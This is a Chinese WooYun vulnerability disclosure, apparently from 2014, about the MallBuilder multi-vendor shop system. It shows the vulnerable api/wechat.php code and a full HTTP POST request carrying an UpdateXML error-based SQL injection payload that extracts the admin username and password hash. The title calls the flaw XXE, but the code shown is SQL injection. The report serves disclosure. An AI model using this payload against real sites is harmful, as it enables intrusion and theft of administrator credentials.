乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-10-29: 细节已通知厂商并且等待厂商处理中 2014-11-03: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放 2014-12-28: 细节向核心白帽子及相关领域专家公开 2015-01-07: 细节向普通白帽子公开 2015-01-17: 细节向实习白帽子公开 2014-12-30: 细节向公众公开
mallbuilder多用户商城系统XXE注入
系统 MallBuilder_v5.8.1.1api/wechat.php中
<?phpinclude_once("../includes/global.php");@include_once("../config/wechat_config.php");$wechat=$wechat_config['wechat']?$wechat_config['wechat']:"";define("TOKEN", $wechat);$wechatObj = new wechatCallbackapiTest();if($_GET["echostr"]&&$_GET["signature"]&&$_GET["timestamp"]&&$_GET["nonce"])//if后的get值不存在进入else语句{ $wechatObj->valid(); }else{ $wechatObj->responseMsg(); //跟踪responseMsg()函数}class wechatCallbackapiTest{ public function valid() { $echoStr = $_GET["echostr"]; if($this->checkSignature()){ echo $echoStr; exit; } } public function responseMsg() { $postStr = $GLOBALS["HTTP_RAW_POST_DATA"]; global $db,$config; if (!empty($postStr)){ $postObj = simplexml_load_string($postStr, 'SimpleXMLElement', LIBXML_NOCDATA); $fromUsername = $postObj->FromUserName; $toUsername = $postObj->ToUserName; $keyword = trim($postObj->Content); $time = time(); $RX_TYPE = trim($postObj->MsgType); $num=0; $str=""; if($RX_TYPE=='text')//是POST的MsgType为text { if(!empty($keyword)) //在xml数据中定义Content变量 { $sql="select pname,id,pic from ".PRO." where pname like '%$keyword%' order by id desc limit 0,4"; //Content 进入sql语句,可以注入 $db->query($sql); $re=$db->getRows(); foreach($re as $val) { $str.="<item> <Title><![CDATA[".$val['pname']."]]></Title> <Description><![CDATA[]]></Description> <PicUrl><![CDATA[".$val['pic']."]]></PicUrl> <Url><![CDATA[".$config['weburl']."?m=product&s=detail&id=".$val['id']."]]></Url> </item>"; $num++; echo "test2"; } if($num>0) { $textTpl = "<xml> <ToUserName><![CDATA[%s]]></ToUserName> <FromUserName><![CDATA[%s]]></FromUserName> <CreateTime>%s</CreateTime> <MsgType><![CDATA[news]]></MsgType> <ArticleCount>".$num."</ArticleCount> <Articles>".$str."</Articles> <FuncFlag>1</FuncFlag> </xml>"; $msgType = "text"; $contentStr = ""; $resultStr = sprintf($textTpl, $fromUsername, $toUsername, $time, $msgType, $contentStr); echo $resultStr; } } else echo "Input something1 "; } else{ echo "Input something2 "; } }else{ echo ""; echo "test6"; exit; } } private function checkSignature() { $signature = $_GET["signature"]; $timestamp = $_GET["timestamp"]; $nonce = $_GET["nonce"]; $token = TOKEN; $tmpArr = array($token, $timestamp, $nonce); sort($tmpArr); $tmpStr = implode( $tmpArr ); $tmpStr = sha1( $tmpStr ); if( $tmpStr == $signature ){ return true; }else{ return false; } }}?>
POST 提交的代码
POST /mallbuilder/api/wechat.php HTTP/1.1Host: 127.0.0.1:8088Proxy-Connection: keep-aliveCache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36Accept-Encoding: gzip,deflate,sdchAccept-Language: zh-CN,zh;q=0.8Cookie: PHPSESSID=fdb687e31fb1d9a23b1b5dc3221123f9<xml> <ToUserName>test1</ToUserName> <FromUserName>test3</FromUserName> <CreateTime>123456</CreateTime><MsgType>text</MsgType> <ArticleCount>11</ArticleCount><Articles>aaa</Articles><FuncFlag>0</FuncFlag><Content>test' and UpdateXML(1,CONCAT(0x5b,mid((SELECT (select concat(user,0x23,password) from mallbuilder_admin limit 1)),1,32),0x5d),1)#</Content></xml>
官网demo演示
无
危害等级:无影响厂商忽略
忽略时间:2014-12-30 14:44
暂无